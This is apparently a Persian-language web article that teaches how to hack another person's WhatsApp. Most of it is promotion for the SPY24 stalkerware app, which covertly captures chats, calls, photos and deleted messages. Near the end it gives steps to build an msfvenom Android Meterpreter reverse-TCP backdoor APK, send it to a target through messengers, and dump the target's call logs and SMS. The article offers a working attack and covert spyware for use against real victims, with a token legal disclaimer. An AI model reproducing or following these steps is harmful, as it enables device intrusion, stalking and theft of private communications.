آموزش هک واتساپ از راه دور و با برنامه ۲۰۲۲

روش های مختلفی برای هک کردن واتساپ وجود دارد که نیازمند دسترسی به گوشی قربانی است ما در این مقاله به آموزش هک واتساپ از راه دور و با برنامه ۲۰۲۲ می پردازیم.

آموزش  هک واتساپ  از راه دور و با برنامهspy24  ۲۰۲۲

راه های مختلفی برای هک کردن واتساپ شخص دیگری وجود دارد، یکی از آنها استفاده از برنامه Termux در گوشی اندرویدی است. و دیگری را که برای والدین پیشنهاد می کنیم برنامه SPY24 است. اگر کنجکاو هستید که چگونه این کار را انجام دهید، می توانید این مقاله را دنبال نمایید تا متوجه شوید.

در اینجا قدرتمندترین برنامه هک واتساپ در مورد نحوه هک کردن واتساپ شخص دیگری با استفاده از Termux Script در تلفن اندرویدی است که می توانید در تلفن هوشمند اندرویدی خود امتحان کنید.

استفاده از برنامه SPY24 برای هک کردن واتساپ

دانلود برنامه هک واتساپ

برنامه spy24 یک برنامه قدرتمند برای والدین یا افرادی است که می خواهند فعالیت های یک فرد را زیر نظر بگیرند و به آنها کمک می کند که فرد مورد نظر را از خطرات احتمالی محفوظ نگاه دارد.

برای دانلود برنامه هک واتساپ spy24 روی لینک زیر کلیک کنید:

هک واتساپ

شما می‌توانید پیام‌ها و فعالیت‌های واتس‌اپ را از یک دستگاه خاص، مانند تلفن هوشمند، حتی اگر ROOT ندارید، ببینید. در اینجا نحوه انجام آن آمده است:

  1. در دستگاه مورد نظر، برنامه Spy Phone را دانلود و نصب کنید.

نسخه اندروید برنامه Spy Phone را دانلود کنید. WhatsApp Tracker 2 نسخه دوم WhatsApp Tracker است. هنگامی که هنگام نصب از شما خواسته شد، با وارد کردن ایمیل و رمز عبور خود، یک حساب کاربری ایجاد کنید.

  1. بررسی کنید که اعلان‌های فشار و قابلیت دسترسی را در طول فرآیند نصب فعال کرده‌اید.

این بحث ما را به پایان می رساند. اکنون می توانید پیام ها و فعالیت های WhatsApp را با دیدن زمان و تاریخ و همچنین تماس و مدت زمان هر تماس هک کنید. مهم است که به یاد داشته باشید که برنامه Spy Phone یک برنامه کاملاً قانونی است که باید به طور قانونی استفاده شود، بنابراین اگر دستگاه کارمند خود را دنبال می کنید، مطمئن شوید که او را مطلع کرده و از سازمان مجری قانون محلی مجوز رسمی دریافت کنید. هک کردن واتس اپ می تواند خلاف قانون کشور شما باشد.

این دقیقاً روشی برای هک کردن واتس اپ نیست. ما از هیچ نوع هک استفاده نمی کنیم. ما از ویژگی های داخلی سیستم اندروید استفاده می کنیم. با نصب برنامه بر روی تلفنی که می خواهید نظارت داشته باشید، می توانید بدون هک واتس اپ به تمام ارتباطات واتس اپ دسترسی داشته باشید.

برنامه Spy Phone برنامه ردیابی ایده آل برای شما است زیرا:

  1. برنامه Spy Phone اولین اپلیکیشنی است که WhatsApp Spy را بدون نیاز به ROOT ارائه می دهد.
  2. حتی یک فرد غیر فنی ممکن است به راحتی نرم افزار را دانلود و نصب کند.
  3. شما یک دوره آزمایشی ۳ روزه رایگان برای آزمایش همه چیز دریافت می‌کنید، و ما اطلاعات کارت اعتباری شما را نمی‌خواهیم مگر اینکه واقعاً پرداخت کنید!
  4. برنامه تلفن جاسوسی یک برنامه کامل با قیمت مناسب با بسته تخفیف کامل است که به شما امکان می دهد هر تعداد دستگاه را که دوست دارید، حتی کل سازمان را ردیابی کنید و تقریباً مطمئناً تخفیف دریافت خواهید کرد.
  5. از طریق یک حساب کاربری محافظت شده در وب سایت Spy Phone App، که دارای یک طرح کاربر پسند است، به تمام اطلاعات خود دسترسی خواهید داشت.
  6. نه تنها هک واتس اپ وجود دارد، بلکه عملکردهای مفید بیشتری نیز وجود دارد.
  7. علاوه بر نظارت بر فعالیت‌های کارمندان، برنامه‌های متعدد دیگری نیز وجود دارد: کنترل والدین، ردیابی تلفن گمشده، و پشتیبان‌گیری از داده‌ها برای تلفن هوشمندتان.
  8. برنامه Spy Phone یک تیم پشتیبانی فنی ارائه می دهد که ۲۴ ساعت شبانه روز و ۷ روز هفته در دسترس است و هر زمان که به آن نیاز داشتید آماده کمک به شما است.

اکنون می توانید برنامه رایگان Phone Tracker را دریافت کنید:

بدون ROOT، می توانید از ارتباطات واتس اپ جاسوسی کنید.

به سادگی برنامه را بر روی تلفنی که می خواهید نظارت کنید دانلود و نصب کنید.

هر روز می‌توانیم اخبار نگران‌کننده‌ای درباره کودک‌آزاری، پدوفیل‌ها و سایر مسائل را در تلویزیون، رادیو و اینترنت ببینیم. از سوی دیگر، نوجوان بودن مستلزم تلاش برای چیزهای جدید و زیر پا گذاشتن قوانین است. نوجوان بودن مستلزم یادگیری در مورد جهان، زندگی و مردم است و در عین حال خطر آسیب را نیز به دنبال دارد. ساده ترین روش برای جاسوسی از ارتباطات واتس اپ استفاده از برنامه تلفن جاسوسی است.

با استفاده از برنامه جاسوسی واتس اپ ۲۴spy می توانید کارهای زیر را انجام دهید:

قابلیت های برنامه اسپای 24

گوش دادن به هر مکالمه چت (از جمله چت گروهی)؛

به دنبال شماره تلفن یا نام شخصی باشید که با او گفتگو انجام شده است.

میزان زمان صرف شده برای مکالمه را پیگیری کنید.

نظارت بر تمام عکس های ارسالی و دریافتی از طریق واتس اپ.

جاسوس WhatsApp با هر دو دستگاه اندروید و iOS سازگار است. جیلبریک برای iOS لازم است.

هک واتس اپ با نرم افزار Spy Phone.

می‌توانید هر مکالمه‌ای را در تلفن همراه فرزندتان با برنامه Spy Phone برای اندروید دنبال کنید، حتی اگر دستگاه روت نشده باشد. جاسوسی واتس اپ تنها یکی از ویژگی های متعددی است که با اپلیکیشن Spy Phone در دسترس است. همین حالا با دانلود و نصب این برنامه ردیاب واتس اپ از این قابلیت جاسوسی واتس اپ استفاده کنید.

بهترین برنامه جاسوسی اجتماعی واتس اپ را دریافت کنید. بسیاری از عملکردهای دیگر برای یک جاسوس اجتماعی مانند فیس بوک، اسنپ چت یا اینستاگرام در مانیتورینگ spy24 گنجانده شده است. Spy24 یک ابزار ردیابی تلفن با امکانات کامل است که پیام‌های رسانه‌های اجتماعی را نیز ردیابی می‌کند.

حتی اگر پیام های ارسالی یا دریافتی پاک شده باشند، ردیابی ارتباطات واتس اپ امکان پذیر است. فایل های به اشتراک گذاشته شده از طریق واتس اپ، مانند عکس ها و فیلم ها، برای مشاهده یا دانلود در دسترس خواهند بود. حتی اگر فایل ها از گوشی پاک شوند، در دسترس باقی می مانند.

حتی اگر اتصال به اینترنت وجود نداشته باشد، ردیابی می تواند انجام شود. پس از دسترسی به اینترنت، تمام داده های ضبط شده روی سرور آپلود می شوند. همه اینها بدون نیاز به روت کردن گوشی شما امکان پذیر است، که می تواند فرآیندی زمان بر باشد. همین حالا برنامه را دانلود و نصب کنید تا ببینید spy24  چه کاری می تواند برای شما انجام دهد.

هیچ نرم افزار رسمی جاسوسی واتس اپ در دسترس نیست. واتس‌اپ فناوری‌ای ایجاد نکرده است که از آن برای جاسوسی از پیام‌های واتس‌اپ استفاده شود. به همین دلیل است که اپلیکیشنی مانند  spy24توصیه می شود. شما باید نرم افزار را به طور قانونی روی تلفنی که می خواهید ردیابی کنید نصب کنید و می توانید تمام پیام های WhatsApp را ردیابی کنید.

 

همین حالا برنامه spy24 رو از لینک زیر دانلود کنید

دانلود برنامه spy24

 

در اینجا نحوه هک کردن واتساپ بدون دست زدن به تلفن همراه قربانی آمده است:

هک واتساپ بدون دسترسی به گوشی فرد

  1. مطمئن شوید که دستگاه یا تلفن هوشمند شما حداقل دارای Lollipop 5.0 یا بالاتر، ۳۲ یا ۶۴ بیتی و سیستم عامل (OS) بالاتر باشد.
  2. برنامه termux را در فروشگاه Google Play دانلود کنید یا به آدرس وب سایت رسمی در com مراجعه کنید
  3. سپس آدرس IP خود را با تایپ ifconfig در برنامه Termux مشاهده کنید.
  4. سپس این اسکریپت termux را توسط hack wa 2022 بنویسید: msfvenom -p android/meterpreter/reverse_tcp LHOST = 192.168.43.166 LPORT=4444 R >hack.apk>
  5. LHOST در جمله با آدرس IP شما در مرحله اول نشان داده شده است.
  6. .منوی File >> Home > >hack.apk را باز کنید تا فایل Backdoor تمام شده را ببینید.
  7. .خب، گام بعدی ارسال فایل پشتی به هدف خود، هم از طریق مسنجر، واتساپ و سایرین است.
  8. .هنگامی که هدف فایل apk ارسالی شما را با موفقیت نصب کرد، به این معنی است که می توانید حساب WhatsApp هدف را مشاهده کنید یا روی آن ضربه بزنید.

پس چگونه می توانیم نتایج کار هک خود را ببینیم؟

بررسی های زیر را ببینید.

  • برای مشاهده تاریخچه تماس مقصد، dump_callog را تایپ کنید
  • برای مشاهده تاریخچه پیام اکانت هدف WhatsApp، dump-sms را تایپ کنید.

در اینجا نحوه هک کردن حساب واتساپ با این اسکریپت termux بدون قرض گرفتن تلفن هوشمند مورد نظر آمده است، آیا آسان نیست؟

 

توجه: ما فقط برای کاربرد های اخلاقی و قانونی این آموزش ها را ارائه می نماییم هرگونه  استفاده از این مقاله از نظر مسئولیت های شرعی و قانونی به عهده خود شما است.

نوشته های مشابه

دکمه بازگشت به بالا